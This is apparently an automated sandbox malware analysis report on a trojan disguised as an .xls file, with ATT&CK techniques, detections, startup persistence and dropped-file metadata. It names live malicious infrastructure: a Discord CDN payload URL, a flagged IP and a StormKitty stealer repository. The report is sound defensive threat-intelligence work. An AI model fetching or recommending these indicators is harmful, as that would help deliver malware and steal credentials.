              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		2
              Registry Run Keys / Startup Folder              		311
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory13
              System Information Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Registry Run Keys / Startup Folder              		2
              Obfuscated Files or Information              		Security Account Manager131
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Software Packing              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets141
              Virtualization/Sandbox Evasion              		SSHKeylogging13
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Masquerading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              rDoc5633276235623657_xls.exe100%AviraTR/Dropper.Gen
              rDoc5633276235623657_xls.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\XClient.exe0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://upx.sf.net0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://support.mozilla.org0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://cdn.discordapp.com/attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=660%Avira URL Cloudsafe
              https://urn.to/r/sds_seeaCould0%Avira URL Cloudsafe
              http://james.newtonking.com/projects/json0%Avira URL Cloudsafe
              https://www.newtonsoft.com/jsonschema0%Avira URL Cloudsafe
              https://cdn.discordapp.com/attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66f6783b&is=66f526bb&hm=22a3bafe0f63ec86e36ba63ace27289331a1b6e8c8a217e16ac633d8848215f6&0%Avira URL Cloudsafe
              https://github.com/LimerBoy/StormKitty0%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              http://cdn.discordapp.com0%Avira URL Cloudsafe
              https://cdn.discordapp.com0%Avira URL Cloudsafe
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%Avira URL Cloudsafe
              178.215.236.2180%Avira URL Cloudsafe
              https://www.nuget.org/packages/Newtonsoft.Json.Bson0%Avira URL Cloudsafe
              http://cdn.discordapp.comd0%Avira URL Cloudsafe
              https://urn.to/r/sds_see0%Avira URL Cloudsafe
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cdn.discordapp.com
              		162.159.135.233
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://cdn.discordapp.com/attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66f6783b&is=66f526bb&hm=22a3bafe0f63ec86e36ba63ace27289331a1b6e8c8a217e16ac633d8848215f6&false
                • Avira URL Cloud: safe
                		unknown
                178.215.236.218true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drfalse
                • URL Reputation: safe
                		unknown
                https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFplaces.raw.2.drfalse
                • URL Reputation: safe
                		unknown
                https://duckduckgo.com/ac/?q=RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drfalse
                • URL Reputation: safe
                		unknown
                https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://cdn.discordapp.com/attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66rDoc5633276235623657_xls.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drfalse
                • URL Reputation: safe
                		unknown
                http://upx.sf.netAmcache.hve.9.drfalse
                • URL Reputation: safe
                		unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drfalse
                • URL Reputation: safe
                		unknown
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000002.00000002.2656518468.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.drfalse
                • URL Reputation: safe
                		unknown
                https://cdn.discordapp.comrDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D56000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000002.00000002.2656518468.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.drfalse
                • URL Reputation: safe
                		unknown
                https://www.ecosia.org/newtab/RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drfalse
                • URL Reputation: safe
                		unknown
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brplaces.raw.2.drfalse
                • URL Reputation: safe
                		unknown
                https://urn.to/r/sds_seeaCouldRegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://james.newtonking.com/projects/jsonRegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ac.ecosia.org/autocomplete?q=RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drfalse
                • URL Reputation: safe
                		unknown
                https://github.com/LimerBoy/StormKittyRegAsm.exe, 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallRegAsm.exe, 00000002.00000002.2656518468.0000000003E16000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drfalse
                • URL Reputation: safe
                		unknown
                http://cdn.discordapp.comrDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D63000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.newtonsoft.com/jsonschemaRegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.nuget.org/packages/Newtonsoft.Json.BsonRegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.mozilla.orgplaces.raw.2.drfalse
                • URL Reputation: safe
                		unknown
                https://urn.to/r/sds_seeRegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesRegAsm.exe, 00000002.00000002.2656518468.0000000003E16000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.drfalse
                • URL Reputation: safe
                		unknown
                http://cdn.discordapp.comdrDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D63000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                162.159.135.233
                		cdn.discordapp.comUnited States
                		13335CLOUDFLARENETUSfalse
                178.215.236.218
                		unknownGermany
                		10753LVLT-10753UStrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1519397
                Start date and time:2024-09-26 13:25:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 56s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Critical Process Termination
                Sample name:rDoc5633276235623657_xls.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@6/20@1/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 218
                • Number of non-executed functions: 3
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: rDoc5633276235623657_xls.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                07:26:14API Interceptor793122x Sleep call for process: RegAsm.exe modified
                12:26:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                162.159.135.233Cheat.Lab.2.7.2.msiGet hashmaliciousRedLineBrowse
                • cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
                #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
                • cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
                QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                • cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                We7WnoqeXe.exeGet hashmaliciousAmadey RedLineBrowse
                • cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
                mosoxxxHack.exeGet hashmaliciousAmadey RedLineBrowse
                • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
                Sales-contract-deaho-180521-poweruae.docGet hashmaliciousUnknownBrowse
                • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
                PURCHASE ORDER E3007921.EXEGet hashmaliciousSnake KeyloggerBrowse
                • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
                Waybill Document 22700456.exeGet hashmaliciousNanocoreBrowse
                • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
                COMPANY REQUIREMENT.docGet hashmaliciousSnake KeyloggerBrowse
                • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                cdn.discordapp.comhttps://game-repack.site/2024/09/26/bloodborneGet hashmaliciousUnknownBrowse
                • 162.159.133.233
                450230549.exeGet hashmaliciousAgentTeslaBrowse
                • 162.159.134.233
                450230549.exeGet hashmaliciousUnknownBrowse
                • 162.159.134.233
                CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                • 162.159.130.233
                https://mj.ostep.net/acknowledgementsGet hashmaliciousUnknownBrowse
                • 162.159.133.233
                Shipping Documemt.vbsGet hashmaliciousLokibotBrowse
                • 162.159.135.233
                CERENAK-7373.exeGet hashmaliciousUnknownBrowse
                • 162.159.135.233
                CERENAK-7373.exeGet hashmaliciousUnknownBrowse
                • 162.159.135.233
                22.09.2024-22.09.2024.exeGet hashmaliciousAgentTeslaBrowse
                • 162.159.133.233
                receipt#295.vbsGet hashmaliciousUnknownBrowse
                • 162.159.129.233

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUShttps://game-repack.site/2024/09/26/bloodborneGet hashmaliciousUnknownBrowse
                • 104.21.84.200
                e.dllGet hashmaliciousDridex DropperBrowse
                • 104.21.69.9
                https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdfGet hashmaliciousHTMLPhisherBrowse
                • 104.18.38.76
                http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                • 104.16.79.73
                http://ti6.htinenate.comGet hashmaliciousUnknownBrowse
                • 172.67.162.17
                https://coreleete.de/pt/Odrivex/Get hashmaliciousHTMLPhisherBrowse
                • 104.17.25.14
                e.dllGet hashmaliciousDridex DropperBrowse
                • 104.21.69.9
                Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                • 188.114.96.3
                g3V051umJf.htmlGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                https://centuriontm.bizarreonly.netGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                • 104.26.13.205
                LVLT-10753USAwb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 193.25.216.108
                hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 178.215.238.7
                hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 178.215.238.7
                hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 178.215.238.7
                hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 178.215.238.7
                hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 178.215.238.7
                hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 178.215.238.7
                hidakibest.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 178.215.238.7
                hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 178.215.238.7
                hidakibest.x86.elfGet hashmaliciousMirai, GafgytBrowse
                • 178.215.238.7

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                3b5074b1b5d032e5620f69f9f700ff0ehttp://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                • 162.159.135.233
                sRMytgfRpJ.exeGet hashmaliciousRedLineBrowse
                • 162.159.135.233
                nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                • 162.159.135.233
                z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                • 162.159.135.233
                ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                • 162.159.135.233
                sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                • 162.159.135.233
                sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                • 162.159.135.233
                sostener.vbsGet hashmaliciousRemcosBrowse
                • 162.159.135.233
                asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                • 162.159.135.233
                SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 162.159.135.233

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Roaming\XClient.exelchs.exeGet hashmaliciousQuasarBrowse
                  Shipping Documemt.vbsGet hashmaliciousLokibotBrowse
                    AaK2FmzNcl.exeGet hashmaliciousLummaCBrowse
                      SecuriteInfo.com.Trojan.Siggen29.33686.11630.12129.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Trojan.Siggen29.33686.11630.12129.exeGet hashmaliciousUnknownBrowse
                          pic4.jpg.exeGet hashmaliciousAsyncRAT, DcRat, Stealerium, StormKittyBrowse
                            file.exeGet hashmaliciousRisePro StealerBrowse
                              lgnasdfnds.exeGet hashmaliciousLummaCBrowse
                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  rhTHyegj6G.exeGet hashmaliciousLummaCBrowse

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_d844b8734f1fb45ad8a822ff442cea23ced3141_3486005a_52676790-a461-4f19-a7ba-cc778124643c\Report.wer

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.4457903104646446
                                    Encrypted:false
                                    SSDEEP:384:wLkB+1HBU/qaUC0t9MVzzuiF1Y4IO8/7:it1HBU/qa29MZzuiF1Y4IO8
                                    MD5:CAA6941BFBBF1A1F1585D14454677E20
                                    SHA1:2AE8BF7C8D50F29D8993B9A29D1A0FA805CF9CE2
                                    SHA-256:AC933BC15FE3D86148965F71441DF5D9E54A78D6E3A1402FA6D3A3DD8A220694
                                    SHA-512:F4420B3D820F265AE9167C1AF2AF9FAC653750B1E89DBF273F453049D1CC88DC1FC91915AA9615873842A6821B7422E6235BDAEA9854C21ECA43F5C15E99AB67
                                    Malicious:false
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.2.3.6.5.5.2.2.8.0.6.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.6.7.6.7.9.0.-.a.4.6.1.-.4.f.1.9.-.a.7.b.a.-.c.c.7.7.8.1.2.4.6.4.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.6.7.9.9.e.5.-.0.0.e.d.-.4.f.9.3.-.b.6.d.6.-.b.f.6.3.7.4.4.f.d.6.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.6.0.-.0.0.0.1.-.0.0.1.4.-.f.6.2.3.-.b.8.e.2.0.6.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.R.e.g.A.s.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.1././.2.4.:.0.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A2C.tmp.dmp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Thu Sep 26 11:27:35 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):394169
                                    Entropy (8bit):3.64155410806019
                                    Encrypted:false
                                    SSDEEP:3072:kECVgwE4uEqxZELTgC7yU8yXdVR47MzHyCjE5AKeO+Z6cMH:k1OwE48Z6TgC7yzytVS7yHtj77Oc6HH
                                    MD5:873584A7C5B1D1AA095C30530AFC6C12
                                    SHA1:16E1FF462E9686530D03CC5A453DEC77FDD985E6
                                    SHA-256:045CFE56EEEEE2093BEC255AD48D7466F88D38F5A8320AF203D13F9324107F55
                                    SHA-512:FED18DCE645236945EC8E8F485CFDF4E6392E3D16D0D21E7A1E0C8F5AFE127FD1418F6FE060D859AFD5564C9D7193153F752DD2067AB37668FE78D2A04CAB886
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... .......'E.f............4............*..<.......d1..Fv..........T.......8...........T...........HT..q............4...........6..............................................................................eJ......`7......GenuineIntel............T.......`....D.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C31.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):6504
                                    Entropy (8bit):3.7144177633347386
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJJ26QolrAYk4jY4kLpr889bwl7sflWdm:R6lXJ46UYkJ4k/wlAf4A
                                    MD5:3CC03F4FFE0E743245F6C038D0B2BBE7
                                    SHA1:A70E758F6450BEED1D24D02A707FE95B58E785FA
                                    SHA-256:01EFF8F69A3785C6EEB0F664663F1633351B65ADBDE108477535AC20E18A741B
                                    SHA-512:2E31D7F3FF39DCCF0BF29C364D7489C346380B0F84A180561C3A2E484CFD540FF5B4598BBBC757EA06451056EBDC5EF9DA94B5ACC132EC80FD3C1DEFE94AD13B
                                    Malicious:false
                                    Reputation:low
